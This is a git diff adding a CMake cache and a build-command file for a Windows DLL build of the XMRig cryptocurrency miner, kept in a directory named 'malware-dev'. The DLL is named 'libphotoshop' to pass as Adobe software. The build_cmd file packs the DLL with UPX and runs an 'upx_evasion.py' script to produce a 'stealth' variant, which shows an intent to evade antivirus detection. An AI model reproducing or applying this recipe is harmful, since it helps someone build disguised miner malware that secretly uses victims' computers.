archive +CMAKE_C_COMPILER_RANLIB:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ranlib + +//Flags used by the C compiler during all build types. +CMAKE_C_FLAGS:STRING= + +//Flags used by the C compiler during DEBUG builds. +CMAKE_C_FLAGS_DEBUG:STRING=-g + +//Flags used by the C compiler during MINSIZEREL builds. 
+CMAKE_C_FLAGS_MINSIZEREL:STRING=-Os -DNDEBUG + +//Flags used by the C compiler during RELEASE builds. +CMAKE_C_FLAGS_RELEASE:STRING=-O3 -DNDEBUG + +//Flags used by the C compiler during RELWITHDEBINFO builds. +CMAKE_C_FLAGS_RELWITHDEBINFO:STRING=-O2 -g -DNDEBUG + +//Libraries linked by default with all C applications. +CMAKE_C_STANDARD_LIBRARIES:STRING=-lkernel32 -luser32 -lgdi32 -lwinspool -lshell32 -lole32 -loleaut32 -luuid -lcomdlg32 -ladvapi32 + +//Path to a program. +CMAKE_DLLTOOL:FILEPATH=/opt/llvm-mingw/bin/llvm-dlltool + +//Flags used by the linker during all build types. +CMAKE_EXE_LINKER_FLAGS:STRING= + +//Flags used by the linker during DEBUG builds. +CMAKE_EXE_LINKER_FLAGS_DEBUG:STRING= + +//Flags used by the linker during MINSIZEREL builds. +CMAKE_EXE_LINKER_FLAGS_MINSIZEREL:STRING= + +//Flags used by the linker during RELEASE builds. +CMAKE_EXE_LINKER_FLAGS_RELEASE:STRING= + +//Flags used by the linker during RELWITHDEBINFO builds. +CMAKE_EXE_LINKER_FLAGS_RELWITHDEBINFO:STRING= + +//Enable/Disable output of build database during the build. +CMAKE_EXPORT_BUILD_DATABASE:BOOL= + +//Enable/Disable output of compile commands during generation. +CMAKE_EXPORT_COMPILE_COMMANDS:BOOL= + +//Value Computed by CMake. +CMAKE_FIND_PACKAGE_REDIRECTS_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/build/CMakeFiles/pkgRedirects + +//Convert GNU import libraries to MS format (requires Visual Studio) +CMAKE_GNUtoMS:BOOL=OFF + +//Install path prefix, prepended onto install directories. +CMAKE_INSTALL_PREFIX:PATH=/usr/local + +//Path to a program. +CMAKE_LINKER:FILEPATH=/opt/llvm-mingw/bin/ld.lld + +//Program used to build from build.ninja files. +CMAKE_MAKE_PROGRAM:FILEPATH=/home/someone/.pyenv/shims/ninja + +//Flags used by the linker during the creation of modules during +// all build types. +CMAKE_MODULE_LINKER_FLAGS:STRING= + +//Flags used by the linker during the creation of modules during +// DEBUG builds. 
+CMAKE_MODULE_LINKER_FLAGS_DEBUG:STRING= + +//Flags used by the linker during the creation of modules during +// MINSIZEREL builds. +CMAKE_MODULE_LINKER_FLAGS_MINSIZEREL:STRING= + +//Flags used by the linker during the creation of modules during +// RELEASE builds. +CMAKE_MODULE_LINKER_FLAGS_RELEASE:STRING= + +//Flags used by the linker during the creation of modules during +// RELWITHDEBINFO builds. +CMAKE_MODULE_LINKER_FLAGS_RELWITHDEBINFO:STRING= + +//Path to a program. +CMAKE_NM:FILEPATH=/opt/llvm-mingw/bin/llvm-nm + +//Path to a program. +CMAKE_OBJCOPY:FILEPATH=/opt/llvm-mingw/bin/llvm-objcopy + +//Path to a program. +CMAKE_OBJDUMP:FILEPATH=/opt/llvm-mingw/bin/llvm-objdump + +//Value Computed by CMake +CMAKE_PROJECT_COMPAT_VERSION:STATIC= + +//Value Computed by CMake +CMAKE_PROJECT_DESCRIPTION:STATIC= + +//Value Computed by CMake +CMAKE_PROJECT_HOMEPAGE_URL:STATIC= + +//Value Computed by CMake +CMAKE_PROJECT_NAME:STATIC=photoshop + +//Path to a program. +CMAKE_RANLIB:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ranlib + +//No help, variable specified on the command line. +CMAKE_RC_COMPILER:UNINITIALIZED=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres + +//Flags for Windows Resource Compiler during all build types. +CMAKE_RC_FLAGS:STRING= + +//Flags for Windows Resource Compiler during DEBUG builds. +CMAKE_RC_FLAGS_DEBUG:STRING= + +//Flags for Windows Resource Compiler during MINSIZEREL builds. +CMAKE_RC_FLAGS_MINSIZEREL:STRING= + +//Flags for Windows Resource Compiler during RELEASE builds. +CMAKE_RC_FLAGS_RELEASE:STRING= + +//Flags for Windows Resource Compiler during RELWITHDEBINFO builds. +CMAKE_RC_FLAGS_RELWITHDEBINFO:STRING= + +//Path to a program. +CMAKE_READELF:FILEPATH=/opt/llvm-mingw/bin/llvm-readelf + +//Flags used by the linker during the creation of shared libraries +// during all build types. +CMAKE_SHARED_LINKER_FLAGS:STRING= + +//Flags used by the linker during the creation of shared libraries +// during DEBUG builds. 
+CMAKE_SHARED_LINKER_FLAGS_DEBUG:STRING= + +//Flags used by the linker during the creation of shared libraries +// during MINSIZEREL builds. +CMAKE_SHARED_LINKER_FLAGS_MINSIZEREL:STRING= + +//Flags used by the linker during the creation of shared libraries +// during RELEASE builds. +CMAKE_SHARED_LINKER_FLAGS_RELEASE:STRING= + +//Flags used by the linker during the creation of shared libraries +// during RELWITHDEBINFO builds. +CMAKE_SHARED_LINKER_FLAGS_RELWITHDEBINFO:STRING= + +//If set, runtime paths are not added when installing shared libraries, +// but are added when building. +CMAKE_SKIP_INSTALL_RPATH:BOOL=NO + +//If set, runtime paths are not added when using shared libraries. +CMAKE_SKIP_RPATH:BOOL=NO + +//Flags used by the archiver during the creation of static libraries +// during all build types. +CMAKE_STATIC_LINKER_FLAGS:STRING= + +//Flags used by the archiver during the creation of static libraries +// during DEBUG builds. +CMAKE_STATIC_LINKER_FLAGS_DEBUG:STRING= + +//Flags used by the archiver during the creation of static libraries +// during MINSIZEREL builds. +CMAKE_STATIC_LINKER_FLAGS_MINSIZEREL:STRING= + +//Flags used by the archiver during the creation of static libraries +// during RELEASE builds. +CMAKE_STATIC_LINKER_FLAGS_RELEASE:STRING= + +//Flags used by the archiver during the creation of static libraries +// during RELWITHDEBINFO builds. +CMAKE_STATIC_LINKER_FLAGS_RELWITHDEBINFO:STRING= + +//Path to a program. +CMAKE_STRIP:FILEPATH=/opt/llvm-mingw/bin/llvm-strip + +//No help, variable specified on the command line. +CMAKE_SYSTEM_NAME:UNINITIALIZED=Windows + +//Path to a program. +CMAKE_TAPI:FILEPATH=CMAKE_TAPI-NOTFOUND + +//If this value is on, makefiles will be generated without the +// .SILENT directive, and all commands will be echoed to the console +// during the make. This is useful for debugging only. With Visual +// Studio IDE projects all commands are done without /nologo. 
+CMAKE_VERBOSE_MAKEFILE:BOOL=FALSE + +//Value Computed by CMake +GhostRider_BINARY_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/build/src/crypto/ghostrider + +//Value Computed by CMake +GhostRider_IS_TOP_LEVEL:STATIC=OFF + +//Value Computed by CMake +GhostRider_SOURCE_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/src/crypto/ghostrider + +//Enable hwloc debug helpers and log +HWLOC_DEBUG:BOOL=OFF + +//Path to a file. +HWLOC_INCLUDE_DIR:PATH=/home/someone/xmrig-deps/gcc/x64/include + +//Path to a library. +HWLOC_LIBRARY:FILEPATH=/home/someone/xmrig-deps/gcc/x64/lib/libhwloc.a + +//Path to a library. +LIB_EAY:FILEPATH=/home/someone/xmrig-deps/gcc/x64/lib/libcrypto.a + +//Path to a file. +OPENSSL_INCLUDE_DIR:PATH=/home/someone/xmrig-deps/gcc/x64/include + +//Path to a library. +SSL_EAY:FILEPATH=/home/someone/xmrig-deps/gcc/x64/lib/libssl.a + +//Path to a file. +UV_INCLUDE_DIR:PATH=/home/someone/xmrig-deps/gcc/x64/include + +//Path to a library. +UV_LIBRARY:FILEPATH=/home/someone/xmrig-deps/gcc/x64/lib/libuv.a + +//Enable ADL (AMD Display Library) or sysfs support (only if OpenCL +// backend enabled) +WITH_ADL:BOOL=OFF + +//Enable Argon2 algorithms family +WITH_ARGON2:BOOL=ON + +//Enable ASM PoW implementations +WITH_ASM:BOOL=ON + +//Enable AVX2 for Blake2 +WITH_AVX2:BOOL=ON + +//Enable builtin RandomX benchmark and stress test +WITH_BENCHMARK:BOOL=OFF + +//Enable CryptoNight-UPX2 algorithm +WITH_CN_FEMTO:BOOL=ON + +//Enable CryptoNight-Heavy algorithms family +WITH_CN_HEAVY:BOOL=ON + +//Enable CryptoNight-Lite algorithms family +WITH_CN_LITE:BOOL=ON + +//Enable CryptoNight-Pico algorithm +WITH_CN_PICO:BOOL=ON + +//Enable CUDA backend +WITH_CUDA:BOOL=OFF + +//Enable debug log output +WITH_DEBUG_LOG:BOOL=OFF + +//Enable DMI/SMBIOS reader +WITH_DMI:BOOL=ON + +//Enable internal embedded JSON config +WITH_EMBEDDED_CONFIG:BOOL=ON + +//Enable environment variables support in config file +WITH_ENV_VARS:BOOL=OFF + +//Enable GhostRider algorithm 
+WITH_GHOSTRIDER:BOOL=ON + +//Enable HTTP protocol support (client/server) +WITH_HTTP:BOOL=ON + +//Enable hwloc support +WITH_HWLOC:BOOL=ON + +//Enable debug log for threads interleave +WITH_INTERLEAVE_DEBUG_LOG:BOOL=OFF + +//Enable KawPow algorithms family +WITH_KAWPOW:BOOL=ON + +//Enable MSR mod & 1st-gen Ryzen fix +WITH_MSR:BOOL=ON + +//Enable NVML (NVIDIA Management Library) support (only if CUDA +// backend enabled) +WITH_NVML:BOOL=OFF + +//Enable OpenCL backend +WITH_OPENCL:BOOL=OFF + +//Target OpenCL version +WITH_OPENCL_VERSION:STRING=200 + +//Enable profiling for developers +WITH_PROFILING:BOOL=OFF + +//Enable RandomX algorithms family +WITH_RANDOMX:BOOL=ON + +//Enable secure access to JIT memory +WITH_SECURE_JIT:BOOL=OFF + +//Enable SSE 4.1 for Blake2 +WITH_SSE4_1:BOOL=ON + +//Enable strict checks for OpenCL cache +WITH_STRICT_CACHE:BOOL=ON + +//Enable OpenSSL support +WITH_TLS:BOOL=ON + +//Enable VAES instructions for Cryptonight +WITH_VAES:BOOL=ON + +//No help, variable specified on the command line. 
+XMRIG_DEPS:UNINITIALIZED=/home/someone/xmrig-deps/gcc/x64 + +//Value Computed by CMake +argon2_BINARY_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/build/src/3rdparty/argon2 + +//Value Computed by CMake +argon2_IS_TOP_LEVEL:STATIC=OFF + +//Dependencies for the target +argon2_LIB_DEPENDS:STATIC=general;argon2-sse2;general;argon2-ssse3;general;argon2-xop;general;argon2-avx2;general;argon2-avx512f; + +//Value Computed by CMake +argon2_SOURCE_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/src/3rdparty/argon2 + +//Value Computed by CMake +ethash_BINARY_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/build/src/3rdparty/libethash + +//Value Computed by CMake +ethash_IS_TOP_LEVEL:STATIC=OFF + +//Value Computed by CMake +ethash_SOURCE_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/src/3rdparty/libethash + +//Value Computed by CMake +photoshop_BINARY_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/build + +//Value Computed by CMake +photoshop_IS_TOP_LEVEL:STATIC=ON + +//Dependencies for the target +photoshop_LIB_DEPENDS:STATIC=general;xmrig-asm;general;/home/someone/xmrig-deps/gcc/x64/lib/libssl.a;general;/home/someone/xmrig-deps/gcc/x64/lib/libcrypto.a;general;/home/someone/xmrig-deps/gcc/x64/lib/libuv.a;general;ws2_32;general;psapi;general;iphlpapi;general;userenv;general;dbghelp;general;crypt32;general;/home/someone/xmrig-deps/gcc/x64/lib/libhwloc.a;general;argon2;general;ethash;general;ghostrider;general;pthread; + +//Value Computed by CMake +photoshop_SOURCE_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll + + +######################## +# INTERNAL cache entries +######################## + +//ADVANCED property for variable: CMAKE_ADDR2LINE +CMAKE_ADDR2LINE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_AR +CMAKE_AR-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_COMPILER +CMAKE_ASM_COMPILER-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_COMPILER_AR 
+CMAKE_ASM_COMPILER_AR-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_COMPILER_CLANG_SCAN_DEPS +CMAKE_ASM_COMPILER_CLANG_SCAN_DEPS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_COMPILER_RANLIB +CMAKE_ASM_COMPILER_RANLIB-ADVANCED:INTERNAL=1 +CMAKE_ASM_COMPILER_WORKS:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_FLAGS +CMAKE_ASM_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_FLAGS_DEBUG +CMAKE_ASM_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_FLAGS_MINSIZEREL +CMAKE_ASM_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_FLAGS_RELEASE +CMAKE_ASM_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_FLAGS_RELWITHDEBINFO +CMAKE_ASM_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//This is the directory where this CMakeCache.txt was created +CMAKE_CACHEFILE_DIR:INTERNAL=/home/someone/malware-dev/xmrig-minimized-dll/build +//Major version of cmake used to create the current loaded cache +CMAKE_CACHE_MAJOR_VERSION:INTERNAL=4 +//Minor version of cmake used to create the current loaded cache +CMAKE_CACHE_MINOR_VERSION:INTERNAL=1 +//Patch version of cmake used to create the current loaded cache +CMAKE_CACHE_PATCH_VERSION:INTERNAL=2 +//Path to CMake executable. +CMAKE_COMMAND:INTERNAL=/usr/bin/cmake +//Path to cpack program executable. +CMAKE_CPACK_COMMAND:INTERNAL=/usr/bin/cpack +//Path to ctest program executable. 
+CMAKE_CTEST_COMMAND:INTERNAL=/usr/bin/ctest +//ADVANCED property for variable: CMAKE_CXX_COMPILER +CMAKE_CXX_COMPILER-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_COMPILER_AR +CMAKE_CXX_COMPILER_AR-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_COMPILER_CLANG_SCAN_DEPS +CMAKE_CXX_COMPILER_CLANG_SCAN_DEPS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_COMPILER_RANLIB +CMAKE_CXX_COMPILER_RANLIB-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_FLAGS +CMAKE_CXX_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_FLAGS_DEBUG +CMAKE_CXX_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_FLAGS_MINSIZEREL +CMAKE_CXX_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_FLAGS_RELEASE +CMAKE_CXX_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_FLAGS_RELWITHDEBINFO +CMAKE_CXX_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_STANDARD_LIBRARIES +CMAKE_CXX_STANDARD_LIBRARIES-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_COMPILER +CMAKE_C_COMPILER-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_COMPILER_AR +CMAKE_C_COMPILER_AR-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_COMPILER_CLANG_SCAN_DEPS +CMAKE_C_COMPILER_CLANG_SCAN_DEPS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_COMPILER_RANLIB +CMAKE_C_COMPILER_RANLIB-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_FLAGS +CMAKE_C_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_FLAGS_DEBUG +CMAKE_C_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_FLAGS_MINSIZEREL +CMAKE_C_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_FLAGS_RELEASE +CMAKE_C_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_FLAGS_RELWITHDEBINFO 
+CMAKE_C_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_STANDARD_LIBRARIES +CMAKE_C_STANDARD_LIBRARIES-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_DLLTOOL +CMAKE_DLLTOOL-ADVANCED:INTERNAL=1 +//Path to cache edit program executable. +CMAKE_EDIT_COMMAND:INTERNAL=/usr/bin/ccmake +//Executable file format +CMAKE_EXECUTABLE_FORMAT:INTERNAL=Unknown +//ADVANCED property for variable: CMAKE_EXE_LINKER_FLAGS +CMAKE_EXE_LINKER_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXE_LINKER_FLAGS_DEBUG +CMAKE_EXE_LINKER_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXE_LINKER_FLAGS_MINSIZEREL +CMAKE_EXE_LINKER_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXE_LINKER_FLAGS_RELEASE +CMAKE_EXE_LINKER_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXE_LINKER_FLAGS_RELWITHDEBINFO +CMAKE_EXE_LINKER_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXPORT_BUILD_DATABASE +CMAKE_EXPORT_BUILD_DATABASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXPORT_COMPILE_COMMANDS +CMAKE_EXPORT_COMPILE_COMMANDS-ADVANCED:INTERNAL=1 +//Name of external makefile project generator. +CMAKE_EXTRA_GENERATOR:INTERNAL= +//Name of generator. +CMAKE_GENERATOR:INTERNAL=Ninja +//Generator instance identifier. +CMAKE_GENERATOR_INSTANCE:INTERNAL= +//Name of generator platform. +CMAKE_GENERATOR_PLATFORM:INTERNAL= +//Name of generator toolset. 
+CMAKE_GENERATOR_TOOLSET:INTERNAL= +//Source directory with the top level CMakeLists.txt file for this +// project +CMAKE_HOME_DIRECTORY:INTERNAL=/home/someone/malware-dev/xmrig-minimized-dll +//ADVANCED property for variable: CMAKE_LINKER +CMAKE_LINKER-ADVANCED:INTERNAL=1 +//Name of CMakeLists files to read +CMAKE_LIST_FILE_NAME:INTERNAL=CMakeLists.txt +//ADVANCED property for variable: CMAKE_MAKE_PROGRAM +CMAKE_MAKE_PROGRAM-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_MODULE_LINKER_FLAGS +CMAKE_MODULE_LINKER_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_MODULE_LINKER_FLAGS_DEBUG +CMAKE_MODULE_LINKER_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_MODULE_LINKER_FLAGS_MINSIZEREL +CMAKE_MODULE_LINKER_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_MODULE_LINKER_FLAGS_RELEASE +CMAKE_MODULE_LINKER_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_MODULE_LINKER_FLAGS_RELWITHDEBINFO +CMAKE_MODULE_LINKER_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_NM +CMAKE_NM-ADVANCED:INTERNAL=1 +//number of local generators +CMAKE_NUMBER_OF_MAKEFILES:INTERNAL=4 +//ADVANCED property for variable: CMAKE_OBJCOPY +CMAKE_OBJCOPY-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_OBJDUMP +CMAKE_OBJDUMP-ADVANCED:INTERNAL=1 +//Platform information initialized +CMAKE_PLATFORM_INFO_INITIALIZED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RANLIB +CMAKE_RANLIB-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_COMPILER +CMAKE_RC_COMPILER-ADVANCED:INTERNAL=1 +CMAKE_RC_COMPILER_WORKS:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_FLAGS +CMAKE_RC_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_FLAGS_DEBUG +CMAKE_RC_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_FLAGS_MINSIZEREL +CMAKE_RC_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: 
CMAKE_RC_FLAGS_RELEASE +CMAKE_RC_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_FLAGS_RELWITHDEBINFO +CMAKE_RC_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_READELF +CMAKE_READELF-ADVANCED:INTERNAL=1 +//Path to CMake installation. +CMAKE_ROOT:INTERNAL=/usr/share/cmake +//ADVANCED property for variable: CMAKE_SHARED_LINKER_FLAGS +CMAKE_SHARED_LINKER_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SHARED_LINKER_FLAGS_DEBUG +CMAKE_SHARED_LINKER_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SHARED_LINKER_FLAGS_MINSIZEREL +CMAKE_SHARED_LINKER_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SHARED_LINKER_FLAGS_RELEASE +CMAKE_SHARED_LINKER_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SHARED_LINKER_FLAGS_RELWITHDEBINFO +CMAKE_SHARED_LINKER_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SKIP_INSTALL_RPATH +CMAKE_SKIP_INSTALL_RPATH-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SKIP_RPATH +CMAKE_SKIP_RPATH-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STATIC_LINKER_FLAGS +CMAKE_STATIC_LINKER_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STATIC_LINKER_FLAGS_DEBUG +CMAKE_STATIC_LINKER_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STATIC_LINKER_FLAGS_MINSIZEREL +CMAKE_STATIC_LINKER_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STATIC_LINKER_FLAGS_RELEASE +CMAKE_STATIC_LINKER_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STATIC_LINKER_FLAGS_RELWITHDEBINFO +CMAKE_STATIC_LINKER_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STRIP +CMAKE_STRIP-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_TAPI +CMAKE_TAPI-ADVANCED:INTERNAL=1 +//uname command +CMAKE_UNAME:INTERNAL=/usr/bin/uname +//ADVANCED 
property for variable: CMAKE_VERBOSE_MAKEFILE +CMAKE_VERBOSE_MAKEFILE-ADVANCED:INTERNAL=1 +//Test FEATURE_avx2_FLAG +FEATURE_avx2_FLAG:INTERNAL=1 +//Test FEATURE_avx2_NOFLAG +FEATURE_avx2_NOFLAG:INTERNAL= +//Test FEATURE_avx512f_FLAG +FEATURE_avx512f_FLAG:INTERNAL=1 +//Test FEATURE_avx512f_NOFLAG +FEATURE_avx512f_NOFLAG:INTERNAL= +//Test FEATURE_sse2_NOFLAG +FEATURE_sse2_NOFLAG:INTERNAL=1 +//Test FEATURE_ssse3_FLAG +FEATURE_ssse3_FLAG:INTERNAL=1 +//Test FEATURE_ssse3_NOFLAG +FEATURE_ssse3_NOFLAG:INTERNAL= +//Test FEATURE_xop_FLAG +FEATURE_xop_FLAG:INTERNAL= +//Test FEATURE_xop_NOFLAG +FEATURE_xop_NOFLAG:INTERNAL= +//Details about finding HWLOC +FIND_PACKAGE_MESSAGE_DETAILS_HWLOC:INTERNAL=[/home/someone/xmrig-deps/gcc/x64/lib/libhwloc.a][/home/someone/xmrig-deps/gcc/x64/include][v()] +//Details about finding OpenSSL +FIND_PACKAGE_MESSAGE_DETAILS_OpenSSL:INTERNAL=[/home/someone/xmrig-deps/gcc/x64/lib/libcrypto.a][/home/someone/xmrig-deps/gcc/x64/include][ ][v3.0.16()] +//Details about finding UV +FIND_PACKAGE_MESSAGE_DETAILS_UV:INTERNAL=[/home/someone/xmrig-deps/gcc/x64/lib/libuv.a][/home/someone/xmrig-deps/gcc/x64/include][v()] +//Have symbol _aligned_malloc +HAVE_ALIGNED_MALLOC:INTERNAL=1 +//Have symbol _rotr +HAVE_ROTR:INTERNAL=1 +//ADVANCED property for variable: LIB_EAY +LIB_EAY-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: OPENSSL_INCLUDE_DIR +OPENSSL_INCLUDE_DIR-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: SSL_EAY +SSL_EAY-ADVANCED:INTERNAL=1 +//Test VAES_SUPPORTED +VAES_SUPPORTED:INTERNAL=1 +//STRINGS property for variable: WITH_OPENCL_VERSION +WITH_OPENCL_VERSION-STRINGS:INTERNAL=120;200;210;220 + + diff --git a/build_cmd b/build_cmd new file mode 100644 index 00000000..9cf76f41 --- /dev/null +++ b/build_cmd 
@@ -0,0 +1,80 @@ + cmake -G Ninja .. \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_SYSTEM_NAME=Windows \ + -DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \ + -DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \ + -DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \ + -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \ + -DCMAKE_FIND_LIBRARY_SUFFIXES=".a" \ + -DWITH_TLS=ON \ + -DWITH_EMBEDDED_CONFIG=ON \ + -DCMAKE_C_FLAGS="-static -fPIC -mtune=generic -fno-lto -Wno-unused-command-line-argument -D_WIN32_WINNT=0x0601 -D__USE_MINGW_ANSI_STDIO=0" \ + -DCMAKE_CXX_FLAGS="-static -fPIC -mtune=generic -fno-lto -Wno-unused-command-line-argument -D_WIN32_WINNT=0x0601 -D__USE_MINGW_ANSI_STDIO=0" \ + -DCMAKE_SHARED_LINKER_FLAGS="-static -Wl,-Bstatic -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive -Wl,--allow-multiple-definition -Wl,--start-group -lmingw32 -lmingwex -lmsvcrt -lkernel32 -luser32 -ladvapi32 -lws2_32 -lpsapi -liphlpapi -luserenv -ldbghelp -lssp -lstdc++ -lstdc++fs -Wl,-lmsvcrt -Wl,-lmingwex -Wl,-lmingw32 -Wl,-lwinpthread -Wl,-lmsvcrt -Wl,-lkernel32 -Wl,-luser32 -Wl,-ladvapi32 -Wl,-lws2_32 -Wl,-lpsapi -Wl,-liphlpapi -Wl,-luserenv -Wl,-ldbghelp -Wl,-lssp -Wl,--end-group" \ + -DCMAKE_EXE_LINKER_FLAGS="-static -Wl,-Bstatic -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive -Wl,--allow-multiple-definition" + + ninja -j10 + +upx --best --lzma libphotoshop.dll -o libphotoshop_packed.dll + python3 ../upx_evasion.py libphotoshop_packed.dll -o libphotoshop_stealth.dll --keep-relocs + + && x86_64-w64-mingw32-g++ -o test_xmrig.exe ../test_xmrig.cpp libphotoshop.dll + + +OR for gcc use + +cmake .. 
-G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release -DCMAKE_C_COMPILER=x86_64-w64-mingw32-gcc -DCMAKE_CXX_COMPILER=x86_64-w64-mingw32-g++ -DWITH_TLS=ON -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 -DCMAKE_SYSTEM_NAME=Windows -DCMAKE_SYSTEM_PROCESSOR=x86_64 -DWITH_EMBEDDED_CONFIG=ON && make -j $(nproc) + + +OR for CREATING ONE EXE WITHOUT DEPENDENCIES + + cmake -G Ninja .. \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_SYSTEM_NAME=Windows \ + -DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \ + -DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \ + -DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \ + -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \ + -DWITH_TLS=ON \ + -DWITH_EMBEDDED_CONFIG=ON + ninja -j10 + + + x86_64-w64-mingw32-g++ -o test_xmrig.exe 